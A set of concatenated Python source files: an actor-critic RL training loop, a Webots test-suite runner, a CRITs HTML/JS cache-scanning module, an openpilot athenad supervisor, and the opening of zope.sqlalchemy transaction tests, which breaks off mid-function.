        num_target_updates,
        num_grad_steps_per_target_update,
        animate,
        logdir,
        normalize_advantages,
        seed,
        n_layers,
        size):
    """Run the full actor-critic training loop on one gym environment.

    Builds an Agent, then for n_iter iterations: samples trajectories,
    updates the critic, estimates advantages, updates the actor, and logs
    diagnostics to logdir via logz. Returns nothing.
    """
    start = time.time()

    #========================================================================================#
    # Set Up Logger
    #========================================================================================#
    setup_logger(logdir, locals())

    #========================================================================================#
    # Set Up Env
    #========================================================================================#

    # Make the gym environment
    env = gym.make(env_name)

    # Set random seeds
    tf.set_random_seed(seed)
    np.random.seed(seed)
    env.seed(seed)

    # Maximum length for episodes
    max_path_length = max_path_length or env.spec.max_episode_steps

    # Is this env continuous, or self.discrete?
    discrete = isinstance(env.action_space, gym.spaces.Discrete)

    # Observation and action sizes
    ob_dim = env.observation_space.shape[0]
    ac_dim = env.action_space.n if discrete else env.action_space.shape[0]

    #========================================================================================#
    # Initialize Agent
    #========================================================================================#
    computation_graph_args = {
        'n_layers': n_layers,
        'ob_dim': ob_dim,
        'ac_dim': ac_dim,
        'discrete': discrete,
        'size': size,
        'learning_rate': learning_rate,
        'num_target_updates': num_target_updates,
        'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
        }

    sample_trajectory_args = {
        'animate': animate,
        'max_path_length': max_path_length,
        'min_timesteps_per_batch': min_timesteps_per_batch,
    }

    estimate_advantage_args = {
        'gamma': gamma,
        'normalize_advantages': normalize_advantages,
    }

    agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args)  # estimate_return_args

    # build computation graph
    agent.build_computation_graph()

    # tensorflow: config, session, variable initialization
    agent.init_tf_sess()

    #========================================================================================#
    # Training Loop
    #========================================================================================#

    total_timesteps = 0
    for itr in range(n_iter):
        print("********** Iteration %i ************"%itr)
        paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
        total_timesteps += timesteps_this_batch

        # Build arrays for observation, action for the policy gradient update by concatenating
        # across paths
        ob_no = np.concatenate([path["observation"] for path in paths])
        ac_na = np.concatenate([path["action"] for path in paths])
        re_n = np.concatenate([path["reward"] for path in paths])
        next_ob_no = np.concatenate([path["next_observation"] for path in paths])
        terminal_n = np.concatenate([path["terminal"] for path in paths])

        # Call tensorflow operations to:
        # (1) update the critic, by calling agent.update_critic
        # (2) use the updated critic to compute the advantage by, calling agent.estimate_advantage
        # (3) use the estimated advantage values to update the actor, by calling agent.update_actor
        # YOUR CODE HERE
        agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
        adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
        agent.update_actor(ob_no, ac_na, adv_n)

        # Log diagnostics
        returns = [path["reward"].sum() for path in paths]
        ep_lengths = [pathlength(path) for path in paths]
        logz.log_tabular("Time", time.time() - start)
        logz.log_tabular("Iteration", itr)
        logz.log_tabular("AverageReturn", np.mean(returns))
        logz.log_tabular("StdReturn", np.std(returns))
        logz.log_tabular("MaxReturn", np.max(returns))
        logz.log_tabular("MinReturn", np.min(returns))
        logz.log_tabular("EpLenMean", np.mean(ep_lengths))
        logz.log_tabular("EpLenStd", np.std(ep_lengths))
        logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
        logz.log_tabular("TimestepsSoFar", total_timesteps)
        logz.dump_tabular()
        logz.pickle_tf_vars()
def main():
    """Parse command-line options and launch one actor-critic training run
    per experiment, each in its own child process.

    Tensorflow does not tolerate calling train_AC repeatedly in the same
    process, so every experiment gets a fresh Process.
    """
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('env_name', type=str)
    parser.add_argument('--exp_name', type=str, default='vac')
    parser.add_argument('--render', action='store_true')
    parser.add_argument('--discount', type=float, default=1.0)
    parser.add_argument('--n_iter', '-n', type=int, default=100)
    parser.add_argument('--batch_size', '-b', type=int, default=1000)
    parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
    parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
    parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
    parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
    parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--n_experiments', '-e', type=int, default=1)
    parser.add_argument('--n_layers', '-l', type=int, default=2)
    parser.add_argument('--size', '-s', type=int, default=64)
    args = parser.parse_args()

    # Create data/<logdir> for this run.
    data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
    if not os.path.exists(data_path):
        os.makedirs(data_path)
    logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
    logdir = os.path.join(data_path, logdir)
    if not os.path.exists(logdir):
        os.makedirs(logdir)

    # ep_len <= 0 means "use the environment's default horizon".
    max_path_length = args.ep_len if args.ep_len > 0 else None

    processes = []
    for e in range(args.n_experiments):
        seed = args.seed + 10 * e
        print('Running experiment with seed %d' % seed)

        # BUGFIX: bind the current seed as a default argument. A plain
        # closure would late-bind the loop variable, so a child process
        # started after the next iteration mutates `seed` (or under the
        # 'spawn' start method) could train with the wrong seed.
        def train_func(seed=seed):
            train_AC(
                exp_name=args.exp_name,
                env_name=args.env_name,
                n_iter=args.n_iter,
                gamma=args.discount,
                min_timesteps_per_batch=args.batch_size,
                max_path_length=max_path_length,
                learning_rate=args.learning_rate,
                num_target_updates=args.num_target_updates,
                num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
                animate=args.render,
                logdir=os.path.join(logdir, '%d' % seed),
                normalize_advantages=not args.dont_normalize_advantages,
                seed=seed,
                n_layers=args.n_layers,
                size=args.size
            )
        # Awkward hacky process runs, because Tensorflow does not like
        # repeatedly calling train_AC in the same thread.
        p = Process(target=train_func, args=tuple())
        p.start()
        processes.append(p)
        # Uncomment the line below to run experiments sequentially instead
        # of in parallel:
        # p.join()
    for p in processes:
        p.join()


if __name__ == "__main__":
    main()
|
test_suite.py | #!/usr/bin/env python
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite."""
import sys
import os
import shutil
import platform
import datetime
import getpass
import glob
import subprocess
import threading
import time
import multiprocessing
from command import Command
# monitor failures: total failure count, also used as the process exit code
failures = 0
# parse arguments: any existing path is treated as an explicit world file to run
filesArguments = []
nomakeOption = False
ansiEscape = True
if len(sys.argv) > 1:
    for arg in sys.argv[1:]:
        if arg == '--nomake':
            # skip the 'make release' build step
            nomakeOption = True
        elif arg == '--no-ansi-escape':
            # disable color/escape sequences in the console output
            ansiEscape = False
        elif os.path.exists(arg):
            filesArguments.append(arg)
        else:
            raise RuntimeError('Unknown option "' + arg + '"')
# test groups, each one maps to a <group>/worlds directory
testGroups = ['api', 'physics', 'protos', 'parser', 'rendering']
# global files
testsFolderPath = os.path.dirname(os.path.abspath(__file__)) + os.sep
outputFilename = testsFolderPath + 'output.txt'
defaultProjectPath = testsFolderPath + 'default' + os.sep
supervisorControllerName = 'test_suite_supervisor'
protoFileNames = ['TestSuiteSupervisor.proto', 'TestSuiteEmitter.proto']
# counter file incremented by the supervisor as worlds get executed
tempWorldCounterFilename = testsFolderPath + 'world_counter.txt'
webotsStdOutFilename = testsFolderPath + 'webots_stdout.txt'
webotsStdErrFilename = testsFolderPath + 'webots_stderr.txt'
# Webots setup (cf. setupWebots() below)
webotsFullPath = ''
webotsVersion = ''
def setupWebots():
    """Find webots binary thanks to WEBOTS_HOME.

    Sets the module globals webotsFullPath, webotsVersion and webotsSysInfo,
    and exports the environment variables that switch Webots into
    test-suite mode. Raises RuntimeError if the binary cannot be queried.
    """
    # Tell Webots it is being driven by the test suite.
    os.putenv('WEBOTS_TEST_SUITE', 'TRUE')
    os.putenv('WEBOTS_EMPTY_PROJECT_PATH', defaultProjectPath)
    global webotsFullPath
    global webotsVersion
    global webotsSysInfo
    if sys.platform == 'win32':
        webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + 'msys64' + \
            os.sep + 'mingw64' + os.sep + 'bin' + os.sep + 'webots.exe'
    else:
        webotsBinary = 'webots'
        if 'WEBOTS_HOME' in os.environ:
            webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + webotsBinary
        else:
            # fall back to a path relative to the tests folder
            webotsFullPath = '..' + os.sep + '..' + os.sep + webotsBinary
        if not os.path.isfile(webotsFullPath):
            print('Error: ' + webotsBinary + ' binary not found')
            if sys.platform == 'win32':
                sys.stdout.flush()
            sys.exit(1)
        webotsFullPath = os.path.normpath(webotsFullPath)
    # Query the binary: 3rd whitespace-separated token of the version string,
    # split on dots (e.g. "Webots R2020a" style output -- see usage below).
    command = Command(webotsFullPath + ' --version')
    command.run()
    if command.returncode != 0:
        raise RuntimeError('Error when getting the Webots version')
    webotsVersion = command.output.replace('\n', ' ').split(' ')[2].split('.')
    command = Command(webotsFullPath + ' --sysinfo')
    command.run()
    if command.returncode != 0:
        raise RuntimeError('Error when getting the Webots information of the system')
    webotsSysInfo = command.output.split('\n')
def findFirstWorldFilename(worldsFilename):
    """Return the first world file name listed in `worldsFilename`.

    The worlds file contains one world path per line; only the first entry
    is needed to boot Webots (the supervisor chains through the rest).
    Uses a context manager so the handle is closed even if reading fails.
    """
    with open(worldsFilename) as file:
        return file.readline().strip()
def resetIndexFile(indexFilename):
    """(Re)create the per-group index file, resetting the world index to 0.

    Uses a context manager so the handle is closed even if the write fails.
    """
    with open(indexFilename, 'w') as file:
        file.write('0\n')
def formatString(s):
    """Align a 'label: value' line by left-padding the label to 20 characters.

    Lines without a ': ' separator are returned unchanged.
    """
    separator = ': '
    position = s.find(separator)
    if position < 0:
        # no label/value separator on this line
        return s
    return '{:<20}'.format(s[:position]) + s[position:]
def resetOutputFile():
    """(Re)create the output file with a header describing the test setup.

    Reads the module globals filled in by setupWebots() (webotsFullPath,
    webotsVersion, webotsSysInfo), so it must run after setupWebots().
    Uses a context manager so the handle is closed even on a write error.
    """
    with open(outputFilename, 'w') as file:
        file.write(formatString('Webots binary: ' + webotsFullPath) + '\n')
        file.write(formatString('Webots version: ' + str(webotsVersion)) + '\n')
        file.write(formatString(
            'Operating System: ' + platform.platform() +
            ' [' + platform.machine() + '] ' + platform.processor() +
            ' (' + platform.node() + ')') + '\n'
        )
        file.write(formatString('Date: ' + datetime.datetime.now().ctime()) + '\n')
        file.write(formatString('Tester: ' + getpass.getuser()) + '\n')
        for line in webotsSysInfo:
            file.write(formatString(line) + '\n')
def appendToOutputFile(txt):
    """Append `txt` to the output file (tailed live by monitorOutputFile()).

    Uses a context manager so the handle is closed even on a write error.
    """
    with open(outputFilename, 'a') as file:
        file.write(txt)
def executeMake():
    """Execute 'make release' to ensure every controller/plugin is compiled.

    Raises RuntimeError if make fails. The caller's working directory is
    restored in a finally block, so an exception raised while running the
    build can no longer leave the process chdir'ed into the tests folder.
    """
    curdir = os.getcwd()
    os.chdir(testsFolderPath)
    try:
        command = Command('make release -j%d' % multiprocessing.cpu_count())
        command.run(silent=False)
    finally:
        os.chdir(curdir)
    if command.returncode != 0:
        raise RuntimeError('Error when executing the Make command')
def generateWorldsList(groupName, worldsFilename):
    """Write the list of world files to run for `groupName` into `worldsFilename`.

    Returns the number of worlds actually written to the file.
    """
    worldsCount = 0
    with open(worldsFilename, 'w') as f:
        # generate the list from the arguments
        if filesArguments:
            # BUGFIX: count only the files belonging to this group. The old
            # code returned len(filesArguments) for every group, which made
            # the executed-worlds check fail when arguments spanned groups.
            for file in filesArguments:
                if file.startswith(groupName):
                    f.write(file + '\n')
                    worldsCount += 1
        # generate the list from 'ls worlds/*.wbt'
        else:
            filenames = glob.glob(testsFolderPath + groupName + os.sep + 'worlds' + os.sep + '*.wbt')
            # BUGFIX: filter with a comprehension instead of list.remove()
            # inside the iteration; mutating a list while iterating it
            # silently skips elements.
            filenames = [name for name in filenames if not name.endswith('test_suite')]
            # alphabetical order
            filenames.sort()
            for filename in filenames:
                # speaker test not working on travis/github action because of missing sound drivers
                if (not filename.endswith('_temp.wbt') and
                        not (('TRAVIS' in os.environ or 'GITHUB_ACTIONS' in os.environ) and
                             filename.endswith('speaker.wbt'))):
                    f.write(filename + '\n')
                    worldsCount += 1
    return worldsCount
def monitorOutputFile(finalMessage):
    """Display the output file on the console.

    Runs 'tail -f' on the output file and blocks until `finalMessage`
    appears in the stream. The Command handle is stored in the module
    global monitorOutputCommand so the main script can terminate it once
    the suite is done.
    """
    global monitorOutputCommand
    monitorOutputCommand = Command('tail -f ' + outputFilename, ansiEscape)
    monitorOutputCommand.run(expectedString=finalMessage, silent=False)
# ---------------------------------------------------------------------------
# Main script: build, then launch Webots once per test group and collect the
# results into the output file.
# ---------------------------------------------------------------------------
if not nomakeOption:
    executeMake()
setupWebots()
resetOutputFile()
finalMessage = 'Test suite complete'
# Tail the output file in a background thread so progress is visible live.
thread = threading.Thread(target=monitorOutputFile, args=[finalMessage])
thread.start()
webotsArguments = '--mode=fast --stdout --stderr --minimize --batch'
if sys.platform != 'win32':
    webotsArguments += ' --no-sandbox'
for groupName in testGroups:
    testFailed = False
    appendToOutputFile('\n### ' + groupName + ' test\n\n')
    # clear stdout and stderr files
    open(webotsStdErrFilename, 'w').close()
    open(webotsStdOutFilename, 'w').close()
    worldsFilename = testsFolderPath + groupName + os.sep + 'worlds.txt'
    indexFilename = testsFolderPath + groupName + os.sep + 'worlds_index.txt'
    # init temporary world counter file; the supervisor increments it as
    # worlds are executed and it is compared to the expected count below
    tempFile = open(tempWorldCounterFilename, 'w')
    tempFile.write('0')
    tempFile.close()
    # copy the generic supervisor controller into this group's project
    supervisorTargetDirectory = testsFolderPath + groupName + os.sep + 'controllers' + os.sep + \
        supervisorControllerName
    if not os.path.exists(supervisorTargetDirectory):
        os.makedirs(supervisorTargetDirectory)
    shutil.copyfile(
        defaultProjectPath + 'controllers' + os.sep +
        supervisorControllerName + os.sep +
        supervisorControllerName + '.py',
        supervisorTargetDirectory + os.sep + supervisorControllerName + '.py'
    )
    # parser tests uses a slightly different Supervisor PROTO
    protosTargetDirectory = testsFolderPath + groupName + os.sep + 'protos'
    protosSourceDirectory = defaultProjectPath + 'protos' + os.sep
    if not os.path.exists(protosTargetDirectory):
        os.makedirs(protosTargetDirectory)
    for protoFileName in protoFileNames:
        shutil.copyfile(protosSourceDirectory + protoFileName,
                        protosTargetDirectory + os.sep + protoFileName)
    worldsCount = generateWorldsList(groupName, worldsFilename)
    firstSimulation = findFirstWorldFilename(worldsFilename)
    if not os.path.exists(firstSimulation):
        # nothing to run for this group
        continue
    resetIndexFile(indexFilename)
    # Here is an example to run webots in gdb and display the stack
    # when it crashes.
    # This is particularly useful to debug on the jenkins server.
    # command = Command('gdb -ex run --args ' + webotsFullPath + '-bin ' +
    #                   firstSimulation + ' --mode=fast --minimize')
    # command.run(silent = False)
    command = Command(webotsFullPath + ' ' + firstSimulation + ' ' + webotsArguments)
    # redirect stdout and stderr to files
    command.runTest(timeout=10 * 60)  # 10 minutes
    if command.isTimeout or command.returncode != 0:
        if command.isTimeout:
            failures += 1
            appendToOutputFile(
                'FAILURE: Webots has been terminated ' +
                'by the test suite script\n')
        else:
            failures += 1
            appendToOutputFile(
                'FAILURE: Webots exits abnormally with this error code: ' +
                str(command.returncode) + '\n')
        testFailed = True
    else:
        # check count of executed worlds
        tempFile = open(tempWorldCounterFilename)
        counterString = tempFile.read()
        tempFile.close()
        if int(counterString) < worldsCount:
            testFailed = True
            appendToOutputFile('FAILURE: Some tests have not been executed\n')
            appendToOutputFile('- expected number of worlds: %d\n' % (worldsCount))
            appendToOutputFile('- number of worlds actually tested: %s)\n' % (counterString))
        else:
            # NOTE(review): a 'Failure' in stderr bumps the counter but does
            # not set testFailed, so the full logs are not dumped in that
            # case -- confirm this is intentional.
            with open(webotsStdErrFilename, 'r') as file:
                if 'Failure' in file.read():
                    failures += 1
    if testFailed:
        # dump the complete Webots logs to help post-mortem analysis
        appendToOutputFile('\nWebots complete STDOUT log:\n')
        with open(webotsStdOutFilename) as f:
            for line in f:
                appendToOutputFile(line)
        appendToOutputFile('\nWebots complete STDERR log:\n')
        with open(webotsStdErrFilename) as f:
            for line in f:
                appendToOutputFile(line)
                if '(core dumped)' in line:
                    # extract the crashed PID from the shell message and try
                    # to resolve a backtrace from the core dump with gdb
                    l = line[0:line.find(' Segmentation fault')]
                    pid = int(l[l.rfind(' ') + 1:])
                    core_dump_file = '/tmp/core_webots-bin.' + str(pid)
                    if os.path.exists(core_dump_file):
                        appendToOutputFile(subprocess.check_output([
                            'gdb', '--batch', '--quiet', '-ex', 'bt', '-ex',
                            'quit', '../bin/webots-bin', core_dump_file
                        ]))
                        os.remove(core_dump_file)
                    else:
                        appendToOutputFile(
                            'Cannot get the core dump file: "%s" does not exist.' % core_dump_file
                        )
appendToOutputFile('\n' + finalMessage + '\n')
time.sleep(1)  # give the tail thread time to print the final message
if monitorOutputCommand.isRunning():
    monitorOutputCommand.terminate(force=True)
with open(outputFilename, 'r') as file:
    content = file.read()
    # NOTE(review): this counts 'FAILURE ' with a trailing space; the
    # messages appended above use 'FAILURE:' and were already counted via
    # `failures += 1` -- presumably this pattern matches lines written by
    # the supervisor controller. Confirm before changing.
    failures += content.count('FAILURE ')
# the process exit code is the total number of failures
sys.exit(failures)
|
html_js_cache.py | import os
import time
import json
import logging
import threading
from threading import Lock, Thread
from configparser import ConfigParser
from lib.constants import FA_HOME
from lib.modules import base_module
log = logging.getLogger()
class HtmlJsCache(base_module.BaseModule):
    """Module that scans on-disk HTML/JS caches for CRITs indicator values.

    Indicators are pushed in via set_crits_data(); run() periodically spawns
    a scanner thread over any indicators that have not been processed yet.
    Results (the URLs of cached pages whose body contained the indicator
    value) are written back into the shared crits_data structure.

    NOTE(review): `self.data_lock` is assumed to be provided by
    base_module.BaseModule -- confirm.
    """

    def __init__(self):
        super().__init__(name='HtmlJsCache')
        log.info('Initializing HtmlJsCache module.')
        self.config = ConfigParser()
        self.config.read(os.path.join(FA_HOME, "etc", "config.ini"))
        # Read any configuration options you have specified in config.ini
        self.html_cache_path = self.config['module_html_js_cache']['html_cache']
        self.js_cache_path = self.config['module_html_js_cache']['js_cache']
        # Flag polled by the run/scan loops; stop() clears it to shut down.
        self.running = False
        self.crits_data = {
            'module_status': 'initialized',
            'indicators': {}
        }

    def run(self):
        """Main loop: wait for unprocessed indicators and scan the caches.

        Scanning happens in a worker thread so that stop() can interrupt
        the wait between polls.
        """
        self.running = True
        with self.data_lock:
            self.crits_data['module_status'] = 'running'
        while self.running:
            # Find indicators that haven't been processed already.
            with self.data_lock:
                cid_list = list(self.crits_data['indicators'].keys())
            unprocessed_cids = []
            for cid in cid_list:
                with self.data_lock:
                    if not self.crits_data['indicators'][cid]['completed']:
                        unprocessed_cids.append(cid)
            if unprocessed_cids:
                thread = Thread(target=self.scan_cache, name='HtmlJsCacheScanner')
                thread.start()
                # Poll the worker so a stop() request is honored promptly.
                while thread.is_alive() and self.running:
                    time.sleep(2)
            else:
                time.sleep(2)

    def _find_cache_hits(self, cache_path, indicator_value):
        """Return the URLs of cached entries whose body contains `indicator_value`.

        Cache entries are assumed to be JSON documents with a 'url' key
        (as read by the original implementation). Unreadable or malformed
        entries are skipped (best-effort) but logged at debug level instead
        of being silently swallowed by a bare except.
        """
        results = []
        cached_files = [os.path.join(cache_path, f) for f in os.listdir(cache_path)]
        for cached_file in cached_files:
            try:
                with open(cached_file) as f:
                    text = f.read()
                # If we found the indicator, add the URL as a result.
                if indicator_value in text:
                    data = json.loads(text)
                    results.append(data['url'])
            except (OSError, ValueError, KeyError):
                # OSError: unreadable file; ValueError: bad JSON / encoding;
                # KeyError: entry without a 'url' field.
                log.debug('Skipping unusable cache file {}'.format(cached_file))
        return results

    def scan_cache(self):
        """Scan the configured cache for every not-yet-completed indicator."""
        with self.data_lock:
            cid_list = list(self.crits_data['indicators'].keys())
        for cid in cid_list:
            # Ignore processed indicators
            with self.data_lock:
                if self.crits_data['indicators'][cid]['completed']:
                    continue
            # Figure out which cache path to use based on the indicator type.
            with self.data_lock:
                indicator_type = self.crits_data['indicators'][cid]['type']
                indicator_value = self.crits_data['indicators'][cid]['value']
            if 'JS' in indicator_type:
                log.info('Scanning JS cache for indicator {}'.format(cid))
                cache_path = self.js_cache_path
            else:
                log.info('Scanning HTML cache for indicator {}'.format(cid))
                cache_path = self.html_cache_path
            if not cache_path:
                # No cache configured: leave the indicator for a later pass.
                continue
            results = self._find_cache_hits(cache_path, indicator_value)
            # BUGFIX: the miss branch below previously wrote to crits_data
            # WITHOUT holding data_lock; both branches are now locked.
            with self.data_lock:
                indicator = self.crits_data['indicators'][cid]
                if results:
                    # Cache hit: record the matching URLs and mark completed.
                    log.info('Cache hit {} times for indicator {}'.format(len(results), cid))
                    if 'results' not in indicator:
                        indicator['results'] = []
                    if 'observables' not in indicator:
                        indicator['observables'] = []
                    results_data = {'hits': results, 'total_hits': len(results)}
                    indicator['results'].append(results_data)
                    # Since we had results, set the status to In Progress.
                    indicator['status'] = 'In Progress'
                    indicator['completed'] = True
                else:
                    # Since we did not get any results, turn the indicator on.
                    log.info('Cache did not hit for indicator {}. Turning it on.'.format(cid))
                    indicator['status'] = 'Analyzed'
                    indicator['completed'] = True

    def stop(self):
        """Request shutdown; run() and scan polling loops exit at next check."""
        log.warning("Caught interrupt. Shutting down HtmlJsCache...")
        self.running = False

    def set_crits_data(self, crits_data):
        """Replace the shared indicator structure (called by the framework)."""
        with self.data_lock:
            self.crits_data = crits_data

    def get_valid_indicator_types(self):
        # This returns a list of acceptable CRITs indicators types for this
        # module. Include ONLY types that your module is able to process!
        return [
            'String - HTML',
            'String - JS',
            'URI - Path'
        ]

    def poll(self):
        """Return the shared indicator structure (under the data lock)."""
        with self.data_lock:
            return self.crits_data
|
manage_athenad.py | #!/usr/bin/env python3
import time
from multiprocessing import Process
import selfdrive.crash as crash
from common.params import Params
from selfdrive.manager.process import launcher
from selfdrive.swaglog import cloudlog
from selfdrive.version import version, dirty
ATHENA_MGR_PID_PARAM = "AthenadPid"
def main():
    """Supervise athenad: bind crash/log metadata, then relaunch it forever.

    Every exit of the daemon is logged and followed by a 5 second back-off
    before the next launch. The manager PID param is cleared on the way out.
    """
    params = Params()
    dongle_id = params.get("DongleId").decode('utf-8')

    # Attach identifying metadata to cloud logging and crash reporting.
    cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty)
    crash.bind_user(id=dongle_id)
    crash.bind_extra(version=version, dirty=dirty)
    crash.install()

    try:
        while True:
            cloudlog.info("starting athena daemon")
            athena_proc = Process(name='athenad', target=launcher, args=('selfdrive.athena.athenad',))
            athena_proc.start()
            athena_proc.join()
            cloudlog.event("athenad exited", exitcode=athena_proc.exitcode)
            time.sleep(5)
    except Exception:
        cloudlog.exception("manage_athenad.exception")
    finally:
        params.delete(ATHENA_MGR_PID_PARAM)


if __name__ == '__main__':
    main()
|
tests.py | ##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
# Much inspiration from z3c.sqlalchemy/trunk/src/z3c/sqlalchemy/tests/testSQLAlchemy.py
#
# You may want to run the tests with your database. To do so set the environment variable
# TEST_DSN to the connection url. e.g.:
# export TEST_DSN=postgres://plone:plone@localhost/test
# export TEST_DSN=mssql://plone:plone@/test?dsn=mydsn
#
# To test in twophase commit mode export TEST_TWOPHASE=True
#
# NOTE: The sqlite that ships with Mac OS X 10.4 is buggy. Install a newer version (3.5.6)
# and rebuild pysqlite2 against it.
import sys
PY3 = sys.version_info[0] == 3


def u(s):
    """Return `s` as native unicode text (decodes from UTF-8 on Python 2)."""
    return s if PY3 else s.decode('utf-8')


def b(s):
    """Return `s` as bytes (encodes to UTF-8 on Python 3)."""
    return s.encode('utf-8') if PY3 else s
import os
import re
import unittest
import transaction
import threading
import time
from transaction._transaction import Status as ZopeStatus
from transaction.interfaces import TransactionFailedError
import sqlalchemy as sa
from sqlalchemy import orm, sql, exc
from zope.sqlalchemy import datamanager as tx
from zope.sqlalchemy import mark_changed
from zope.testing.renormalizing import RENormalizing
TEST_TWOPHASE = bool(os.environ.get('TEST_TWOPHASE'))
TEST_DSN = os.environ.get('TEST_DSN', 'sqlite:///:memory:')
class SimpleModel(object):
    """Minimal model base class: keyword arguments become attributes."""

    def __init__(self, **kw):
        for name, value in kw.items():
            setattr(self, name, value)

    def asDict(self):
        """Return the public (non-underscore) attributes as a plain dict."""
        return {name: value
                for name, value in self.__dict__.items()
                if not name.startswith('_')}
class User(SimpleModel):
    # Mapped to the `test_users` table by setup_mappers().
    pass


class Skill(SimpleModel):
    # Mapped to the `test_skills` table by setup_mappers().
    pass
# Two engines on the same DSN: the second one backs bound_metadata2 /
# test_two for the multi-database tests.
engine = sa.create_engine(TEST_DSN)
engine2 = sa.create_engine(TEST_DSN)
# See https://code.google.com/p/pysqlite-static-env/
HAS_PATCHED_PYSQLITE = False
if engine.url.drivername == 'sqlite':
    try:
        from pysqlite2.dbapi2 import Connection
    except ImportError:
        pass
    else:
        if hasattr(Connection, 'operation_needs_transaction_callback'):
            HAS_PATCHED_PYSQLITE = True
if HAS_PATCHED_PYSQLITE:
    # The patched pysqlite supports savepoints: take sqlite off the
    # datamanager's savepoint blacklist and force transactional behavior
    # for every operation on this engine.
    from sqlalchemy import event
    from zope.sqlalchemy.datamanager import NO_SAVEPOINT_SUPPORT
    NO_SAVEPOINT_SUPPORT.remove('sqlite')

    @event.listens_for(engine, 'connect')
    def connect(dbapi_connection, connection_record):
        dbapi_connection.operation_needs_transaction_callback = lambda x: True

# Session integrated with the transaction machinery via the extension.
Session = orm.scoped_session(orm.sessionmaker(
    bind=engine,
    extension=tx.ZopeTransactionExtension(),
    twophase=TEST_TWOPHASE,
))
# Same extension but no bound engine; tests bind it explicitly.
UnboundSession = orm.scoped_session(orm.sessionmaker(
    extension=tx.ZopeTransactionExtension(),
    twophase=TEST_TWOPHASE,
))
# Integrated through tx.register() (event system) rather than the extension.
EventSession = orm.scoped_session(orm.sessionmaker(
    bind=engine,
    twophase=TEST_TWOPHASE,
))
# keep_session=True: the session object survives transaction boundaries.
KeepSession = orm.scoped_session(orm.sessionmaker(
    bind=engine,
    extension=tx.ZopeTransactionExtension(keep_session=True),
    twophase=TEST_TWOPHASE,
))
tx.register(EventSession)
metadata = sa.MetaData()  # best to use unbound metadata
test_users = sa.Table(
    'test_users',
    metadata,
    sa.Column('id', sa.Integer, primary_key=True),
    sa.Column('firstname', sa.VARCHAR(255)),  # mssql cannot do equality on a text type
    sa.Column('lastname', sa.VARCHAR(255)),
)
test_skills = sa.Table(
    'test_skills',
    metadata,
    sa.Column('id', sa.Integer, primary_key=True),
    sa.Column('user_id', sa.Integer),
    sa.Column('name', sa.VARCHAR(255)),
    sa.ForeignKeyConstraint(('user_id',), ('test_users.id',)),
)
# Bound metadata, one per engine, for the two-database tests.
bound_metadata1 = sa.MetaData(engine)
bound_metadata2 = sa.MetaData(engine2)
test_one = sa.Table('test_one', bound_metadata1, sa.Column('id', sa.Integer, primary_key=True))
test_two = sa.Table('test_two', bound_metadata2, sa.Column('id', sa.Integer, primary_key=True))
class TestOne(SimpleModel):
    # Mapped to `test_one` (first engine) by setup_mappers().
    pass


class TestTwo(SimpleModel):
    # Mapped to `test_two` (second engine) by setup_mappers().
    pass
def setup_mappers():
    """Map the test model classes onto their tables; return the mappers.

    Other tests can clear mappers by calling clear_mappers(); be more
    robust by setting up mappers in the test setup.
    """
    orm.clear_mappers()
    user_mapper = orm.mapper(
        User,
        test_users,
        properties={'skills': orm.relation(
            Skill,
            primaryjoin=test_users.columns['id'] == test_skills.columns['user_id']),
        })
    skill_mapper = orm.mapper(Skill, test_skills)
    one_mapper = orm.mapper(TestOne, test_one)
    two_mapper = orm.mapper(TestTwo, test_two)
    return [user_mapper, skill_mapper, one_mapper, two_mapper]
class DummyException(Exception):
    # Base class for the control-flow exceptions raised by DummyDataManager.
    pass


class DummyTargetRaised(DummyException):
    # Wraps an exception raised by the dummy manager's target callable.
    pass


class DummyTargetResult(DummyException):
    # Carries the return value of the dummy manager's target callable.
    pass
class DummyDataManager(object):
    """Transaction data manager that deliberately fails at voting time.

    Joined to a transaction in tests to force commit() to fail: tpc_vote
    either runs `target` and raises its outcome (DummyTargetResult for a
    return value, DummyTargetRaised for an exception), or raises a plain
    DummyException when no target is set.
    """

    def __init__(self, key, target=None, args=(), kwargs=None):
        # `key` is returned by sortKey() and orders managers in a transaction.
        self.key = key
        self.target = target
        self.args = args
        # BUGFIX: default was the mutable `kwargs={}`, shared by every
        # instance constructed without the argument; use None as sentinel.
        self.kwargs = {} if kwargs is None else kwargs

    def abort(self, trans):
        pass

    def tpc_begin(self, trans):
        pass

    def commit(self, trans):
        pass

    def tpc_vote(self, trans):
        """Always raise: report the target's outcome, or refuse to commit."""
        if self.target is not None:
            try:
                result = self.target(*self.args, **self.kwargs)
            except Exception as e:
